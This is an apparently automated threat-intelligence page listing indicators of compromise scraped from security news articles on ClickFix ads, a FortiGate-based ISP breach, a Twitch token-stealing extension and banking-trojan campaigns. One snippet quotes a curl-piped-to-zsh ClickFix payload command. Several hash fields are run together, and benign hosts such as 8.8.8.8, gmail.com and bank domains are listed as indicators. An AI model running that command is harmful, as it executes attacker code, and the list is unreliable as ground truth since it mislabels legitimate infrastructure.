ZeroHour

Indicators of compromise

916 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
sha256d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcbb13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aba3fcb Recovered x86 artifact and Amatera PE SHA-256 6759c72365d0cHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32b5a0540; 18c8b79ce68060782e52445a9f38c57e4b6e3f09f625b0465e0a9576e5Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6cf39599df747e4f65484a41d5e5ae7ece345924ea36e4f4ee623ce2f0ae; e6e54a8e8f30cedd8492f515ab95e005478bafb41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11cHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331, InstallFix /cl and recovered InstallFix artifacts SHA-256 ec9111b13bb21c1ce757db666b6df329724ec2ec493bcae1ba64b4ec2e93a331; d4eb6e4cec1e69f3bc94bbe2d743e982863fc8549e49f832846c218e1aHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb1301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f157aab4; ecbbf5c7f1fac026dbaa74e8dac630730b4a49fbbb9fd59c333c48c28768ebfb Fake Ledger, Trezor and Exodus application artifacts SHA-25Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7ec25ed5423e86a9ba1ce41ba8d0de91700e0b680291196dd9975a8a29c; ede6ea506c6221f24618f8a7177f9c2f16b63968f0c34818c45d88f1d0dd03a7; d95e123c2ed35a03b84558b8a3cd7b7e47a15914ed819ca2ce99afe32bHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009Selectors for getData() , balanceOf() and setData() SHA-256 eec09815c3664aa6b3cd370a8b8f566be3b804949cfc514f145262136898b009 September macOS artifact SHA-256 d4150c1c97f047c6edb14767bfHackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f763b124f38f27da4ef52d570aac2 AccountsHelper artifact SHA-256 f71d72711fe132f00d1a10d6f8c0f26c1544b41f57ca9262668dd2c771cc31f7; a90a93e9776852dac869d4097dba2a4741ef5d316a1ae8631329349287Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
sha256f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75eb41998c43341fcf3a494573d6c Arkypc loader and helper SHA-256 f8d09bb7ef38015342fb8ae11c489fc1a3f01e743123e4222e9291cb474fb75e; 131a071301006dbed8dbf4d2e08b2914407b7693ab23566bdfee9f39f1Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads
Cyber Security News
· 15h ago
domainopusaccel.topand loop that polls a command-and-control (C2) server ("ocr.opusaccel[.]top") to receive further instructions that are then executedChina-Linked Hackers Exploit Chrome-Windows Zero-Day Chain to Deploy GRIMWEDGE
The Hacker News
· 16h ago
domaincode-desktop.compromoting a fake macOS disk-cleaning service, 11 using the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . ThHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
domaincodex-craft.cominting to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 15 promoting a fake macOS disk-cleaning service, 11 usiHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
domainhbomax-macos.comng the code-desktop[.]com theme, and six directing users to hbomax-macos[.]com . The mix shows that the operators were targeting both enHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
domainhbomaxx.appal lure categories, including 40 advertisements pointing to hbomaxx[.]app , 36 tied to the developer-oriented codex-craft[.]com , 1HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
domainhbomaxx.uscted to counterfeit HBO Max-themed landing pages, including hbomaxx[.]us . Rather than serving a conventional installer, the siteHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
ipv4164.90.161.147lemetry and /contact exfiltration September macOS execution 164.90.161.147:80 September macOS Post-execution HTTP contact September maHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
ipv4165.22.199.85rect-to-IP TLS C2 using facebook.com SNI Exact PE execution 165.22.199.85 September macOS Telemetry and /contact exfiltration SeptembHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
ipv445.94.47.204omains. Indicators of Compromise Address Branch Role Source 45.94.47.204:80 AMOS helper Enrollment, task polling, and acknowledgemenHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
ipv477.91.65.13nd-and-control technique in which Amatera communicated with 77.91.65.13:443 while presenting facebook.com in TLS SNI and HTTP authoHBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware
GBHackers
· 16h ago
domainayuthayatech.comfied a device group named TH-3BB and directed agents to www.ayuthayatech[.]com, using the MeshCentral WebSocket endpoint /agent.ashx. AHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 16h ago
domainco.thfocused on the FortiGate 60F SSL-VPN appliance at mail.3bb.co[.]th:10443. Scripts named forti1.sh through forti8.sh performeHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 16h ago
domainhunt.io10.11.152[.]4:8009 using CVE-2020-1938, known as Ghostcat. Hunt.io reported evidence of root-level command execution on a compHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 16h ago
domaintriplet.coernal 10.11.x.x environment and systems associated with the triplet.co.th domain. Recovered network configuration data suggested tHackers Exploit FortiGate SSL-VPN Flaw to Breach Thai ISP and Deploy MeshCentral Backdoor
GBHackers
· 16h ago
domainabchina.com.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural CreditTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 22h ago
domainccb.comk of China ( abchina[.]com ) CCB: China Construction Bank ( ccb[.]com ) Rural Credit Cooperatives: a cooperative or credit unioTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 22h ago
domaincom.cnNote: ICBC: Industrial and Commercial Bank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/AgricultuTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 22h ago
domainlzbank.comBank of China ( icbc.com[.]cn ) Lanzhou: Bank of Lanzhou ( lzbank[.]com ) ABC/Agricultural Bank: Agricultural Bank of China ( abcTajin Group: Guarantee Marketplace Vendor Involved in Phishing and Chinese Money Laundering Group
Recorded Future
· 22h ago
domainclean-disk-guide.comOf the rest: 15 purported to be a macOS disk utility (apple.clean-disk-guide[.]com) and 11 used other developer tools as lures (code-desktopHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 23h ago
domaincode-desktop.comsk-guide[.]com) and 11 used other developer tools as lures (code-desktop[.]com). “The campaign proves once again why trusted distributioHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 23h ago
domaincodex-craft.comtrick prospective victims via an OpenAI Codex theme (with a codex-craft[.]com) landing page. Of the rest: 15 purported to be a macOS diHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 23h ago
domainhbomax-macos.comMax lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospective victims via an OpeHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 23h ago
domainhbomaxx.apps, 46 used an HBO Max lure, directing app seekers to either hbomaxx[.]app or hbomax-macos[.]com. Another 36 tried to trick prospectHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 23h ago
domainhbomaxx.usn be taken to a “somewhat-legitimate” looking landing page (hbomaxx[.]us) that includes a join/download button. REG AD Clicking thHBO Max Reddit account compromised to serve ClickFix attacks
The Register · Security
· 23h ago
domainttvnw.nettension redirects Twitch’s video playlist request (to usher.ttvnw[.]net ) through that proxy, it appends the token as an &auth= qTwitch extension with 30K installs exposes users’ OAuth tokens
BleepingComputer
· 1d ago
domainclean-disk-guide.comAI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hboHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 1d ago
domaincode-desktop.com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the aHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 1d ago
domaincodex-craft.comhbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[.]com, 15 promoting apple.clean-disk-guide[.]com, 11 pointing tHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 1d ago
domainember-bridge.comlowing command: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh Hudson Rock noted ember-bHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 1d ago
domainhbomax-macos.com.]com, 11 pointing to code-desktop[.]com, and six promoting hbomax-macos[.]com. This allowed the attackers to target a larger audience tHackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 1d ago
domainhbomaxx.appddit account. The researchers identified 40 ads pointing to hbomaxx[.]app, 36 promoting the fake AI and developer site codex-craft[Hackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 1d ago
domainhbomaxx.usMax subreddits," warned the user . "The advert takes you to hbomaxx[.]us which looks somewhat legitimate, and has a join button /Hackers hijack HBO Max Reddit account to push malware in ClickFix ads
BleepingComputer
· 1d ago
domainagent.3bb.coeshagent/ Targets: mail.3bb.co[.]th (FortiGate SSL-VPN) and agent.3bb.co[.]th (internal portal) The full list of indicators, along w3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 1d ago
domainayuthayatech.comreporting to a control server that the attacker ran at www.ayuthayatech[.]com, under a device group named TH-3BB . Attackers increasing3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 1d ago
domainco.ths over SSH, probed 3BB's internal sales portal at agent.3bb.co[.]th, and searched compromised machines for stored passwords,3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 1d ago
domainhunt.iotacker's commands, and add SSH keys as backup ways back in. Hunt.io said the attacker's main goal was 3BB's subscriber data. Sc3BB Attacker Used MeshCentral Backdoor for Root Access, Targeted Subscriber Credentials
The Hacker News
· 1d ago
domainayuthayatech.coms to a device group named TH-3BB and directed agents to www.ayuthayatech[.]com over port 443. A devices.json export listed multiple enroHackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 1d ago
domainco.tha FortiGate 60F SSL-VPN appliance exposed through mail.3bb.co[.]th:10443. Eight reconnaissance scripts fingerprinted the VPNHackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 1d ago
domainhunt.ioconfiguration. Attack server file directory (Image Source: Hunt.io) Multiple artifacts referenced 3BB infrastructure directly,Hackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 1d ago
domaintriplet.co, including internal 10.11.x.x addresses, systems under the triplet.co.th domain, and organization-specific credentials. A captureHackers Exploit FortiGate SSL-VPN Vulnerability to Attack Broadband Provider
Cyber Security News
· 1d ago
domainf5.comallowlists. Vulnerability scan distribution (Image Source: f5.com) Most activity originated from cloud-hosting infrastructureHackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials
Cyber Security News
· 1d ago
domainserver.hostse it to LAN or public interfaces through the –host option, server.host configuration, container port mappings, Kubernetes ingressHackers Mass-Scan Exposed Vite Servers to Steal AWS and Azure Cloud Credentials
Cyber Security News
· 1d ago
domainserver.hostpose it online through passing the --host flag, setting the server.host, or misconfigured Docker port mappings. The technology compHackers target exposed Vite dev servers to steal AWS, Azure secrets
BleepingComputer
· 1d ago
domainalexue4.devm Developer email listed by chrome-stats Website identifier alexue4[.]dev Copyright identifier linked to the operator IP address 15Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainapi.jeetbot.cc7[.]186 netcup GmbH, Germany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]ccMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domaindrisnya.online6154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hostMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainenhanced-1.jeetbot.cctbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154;Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainenhanced.jeetbot.ccGermany, AS197540; hosts jeetbot[.]cc, api[.]jeetbot[.]cc, enhanced[.]jeetbot[.]cc, and enhanced-1[.]jeetbot[.]cc IP address 132[.]243[.]1Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainext-03.jeetbot.ccIP address 80[.]74[.]26[.]162 CLODO Cloud, AS216154; hosts ext-03[.]jeetbot[.]cc Domain jeetbot[.]cc Operator-controlled domain Domain aMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainext-styles.jeetbot.ccP address 132[.]243[.]113[.]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domaingmail.comtbot[.]cc Operator contact address Email address cybergnyda@gmail[.]com Developer email listed by chrome-stats Website identifierMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainimg.drisnya.onlineelper/ Public extension-helper API endpoint Screenshot host img[.]drisnya[.]online Image hosting endpoint associated with the operation HiMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainjeetbot.ccssociated with the extension listings Email address support@jeetbot[.]cc Operator contact address Email address cybergnyda@gmail[.Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainmorphilina.me]25 CLODO Cloud, AS216154; hosts ext-styles[.]jeetbot[.]cc, morphilina[.]me, and drisnya[.]online IP address 80[.]74[.]26[.]162 CLODOMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainproxy.morphilina.mejeetbot[.]cc Alternate operator proxy C2 and proxy endpoint proxy[.]morphilina[.]me Token-strip proxy endpoint Configuration endpoint ext-sMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainproxy.thebeholder.deno.netup token-collection endpoint Historical collection endpoint proxy[.]thebeholder[.]deno[.]net/set-token Decommissioned backup token-collection endpMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainthebeholderbotapi.vercel.appssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigatMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
domainthebeholder-proxy.deno.deved token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoiMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
sha256141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fcple.com Twitch Enhanced Viewer Firefox Add-ons ID; SHA-256: 141c35607dc0e8e400deb380126b3052bd0495b4d37c8dd979c6aa0204b142fc Note: IP addresses and domains are intentionally defanged (Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
sha256e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8ed Viewer | JeetBot Chrome Web Store extension ID; SHA-256: e17e1e671b597da19b89c5b2d0fa821e90e627860e756ae4947ed27c035330a8 Firefox extension [email protected] Twitch EMalicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users
Cyber Security News
· 1d ago
ipv489.34.96.56ompromise (IoCs):- Type Indicator Description C2 IP address 89.34.96.56 Hard-coded Cyclops Blink command-and-control server C2 TCPCyclops Blink Evolves Into x86-64 Linux Implant With Packet Sniffing and Internal Network Scanning
Cyber Security News
· 1d ago
domainmail.uaiubifas.topStaging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users
Cyber Security News
· 1d ago
domainnoht1ng.topthod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 StagingOne Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users
Cyber Security News
· 1d ago
ipv48.218.50.207n Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging server hosted on Alibaba Cloud in Hong Kong DomainOne Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users
Cyber Security News
· 1d ago
sha25629c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63RAYRABBIT command-and-control domain using port 443 SHA-256 29c7ee41d0cc9e07d981e451df56d0c3d37c41ac4ec10c7b516cc033ee397a63 Trojanized DLL loader, originally identified as 7zp.dll witOne Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users
Cyber Security News
· 1d ago
sha256749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422ely identified as 7zp.dll with internal name boy.dll SHA-256 749160a2f20f82744026719cf72e483595c6aad718efa74d675a98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94edOne Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users
Cyber Security News
· 1d ago
sha256d7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a98662e02422e Encrypted payload blob identified as p SHA-256 D7a3c7eb94edc0e020f74c678743d71d61e944634aade4a67a96c3589e828b3a GRAYRABBIT backdoor with internal name core.dll File name 7One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users
Cyber Security News
· 1d ago
ipv48.8.8.8entire framework. The module also uses Google Public DNS at 8.8.8.8 over DNS-over-HTTPS access to resolve transfer-host names,Sandworm-Linked Cyclops Blink Returns With Network Scanning and Packet-Sniffing Capabilities
GBHackers
· 1d ago
domain115.201.178.68.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain116.181.62.50.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain128.200.178.68.host.secureserver.neta0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain129.202.178.68.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain13.189.202.64.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain135.201.178.68.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain162.201.178.68.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain181.202.178.68.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain48.178.169.192.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain76.180.62.50.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]coHackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domain85.182.62.50.host.secureserver.net[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domaingexwalltool.com[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]cHackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
domainx-wolverine.servebbs.comure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 CHackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha2560849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a1b17917e2e183a4bd9cbcb2ed77e Malicious PDF lure PDF SHA-256 0849a6b87fbef25089ad0be746f84047b080ba81898a8614da43d4ab60ef735a Malicious PDF lure Email SHA-256 debe871710268e7bb770b72c67Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha2560b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5659880e1a8a7b0a2dd851dc5e7a3 Malicious PDF lure PDF SHA-256 0b4d962eef2d06abfe08a8cd0b15edd224d4fae0b57d708aebd77d99667616d5 Malicious PDF lure PDF SHA-256 c521b3a189b0089a2558aa4e42bdHackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha2561b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed4a2145348b953b1d06e2eaf0bf2c Malicious PDF lure PDF SHA-256 1b4d5c95f4fc037ca3c359cea5ca2da1285bbadab12bcdcb47f3dad8bc6fa8ed Malicious PDF lure PDF SHA-256 62ef39ec29966d71c8254f68bd5eHackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha2561f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491042d76c12dbafdcc0766861827c5 Malicious PDF lure PDF SHA-256 1f1a89bef73e4866a198a08e750f96348ce2b82816a8353e9a8a574bfde5f491 Malicious PDF lure PDF SHA-256 ea8af591fe2d605c82bb7831d2ebHackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha25640d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd64f8db457bafafb97a011da59e73 Malicious PDF lure PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd Malicious PDF lure PDF SHA-256 bf92a287a3d79afb73a3f2d38877Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha2564302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e691504489eb6b87bb0 2f0bd59d565 Phishing email artifact HTA SHA-256 4302586202234cdf1ca058fd3c62be0050c8155ed113f3f62337d756e6915044 HTA downloader HTA SHA-256 85767416f8d1e73833ccaa193263d119Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha2564540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697246d3d50110c6b0c248919ad796c6fd4 HTA downloader HTA SHA-256 4540c3af3b1d8c52256f4580dd4d002fadb8c5ff4e32e6a41fdf508455c5b697 HTA downloader HTA SHA-256 92a1428e125f33de012c7f52fb0827beHackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha25647d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95ca6e1b70fe30ba3752b881574365 Malicious PDF lure PDF SHA-256 47d321c1a232e5cdd1e39a06dadbd79114dc1a2f0f8eac289e6b653a5d126f95 Malicious PDF lure PDF SHA-256 d13ad6fc5fda54e65f1214e554a5Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha25651503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c3b5c42dd2a33b5a6520159b41c43b093 HTA downloader HTA SHA-256 51503ce1373c7fa72a1da5c5c4b30f88c8224686669ba4b64196591414fdc64c HTA downloader HTA SHA-256 5b3c2442831d4844ea6b86942f1a0ba2Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago
sha2565a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95ef537a02949315eb768c88906b0c65add HTA downloader HTA SHA-256 5a76669ec410d0b3e21112a4a6fd3207976b299ee27c5fc3d42f2673170ab95e HTA downloader HTA SHA-256 8092b9de455463296898fcaf8c9955d1Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites
Cyber Security News
· 1d ago

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.